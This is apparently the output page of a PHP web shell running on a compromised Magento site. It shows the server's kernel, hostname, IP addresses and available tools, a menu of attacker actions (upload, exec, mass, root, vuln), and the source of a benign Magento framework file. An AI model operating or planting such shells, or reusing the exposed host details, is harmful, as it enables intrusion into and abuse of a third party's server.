Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 3.145.64.192 | Time @ Server : 19 Oct 2024 05:25:31
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/magento/framework/App/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/magento/framework/App/EnvironmentFactory.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\App; use Magento\Framework\App\ObjectManager\Environment\Compiled; use Magento\Framework\App\ObjectManager\Environment\Developer; use Magento\Framework\App\ObjectManager\ConfigLoader; use Magento\Framework\ObjectManager\RelationsInterface; use Magento\Framework\ObjectManager\DefinitionInterface; class EnvironmentFactory { /** * @var RelationsInterface */ private $relations; /** * @var DefinitionInterface */ private $definitions; /** * @param RelationsInterface $relations * @param DefinitionInterface $definitions */ public function __construct( RelationsInterface $relations, DefinitionInterface $definitions ) { $this->relations = $relations; $this->definitions = $definitions; } /** * Create Environment object * * @return EnvironmentInterface */ public function createEnvironment() { switch ($this->getMode()) { case Compiled::MODE: return new Compiled($this); break; default: return new Developer($this); } } /** * Determinate running mode * * @return string */ private function getMode() { if (file_exists(ConfigLoader\Compiled::getFilePath(Area::AREA_GLOBAL))) { return Compiled::MODE; } return Developer::MODE; } /** * Returns definitions * * @return DefinitionInterface */ public function getDefinitions() { return $this->definitions; } /** * Returns relations * * @return RelationsInterface */ public function getRelations() { return $this->relations; } }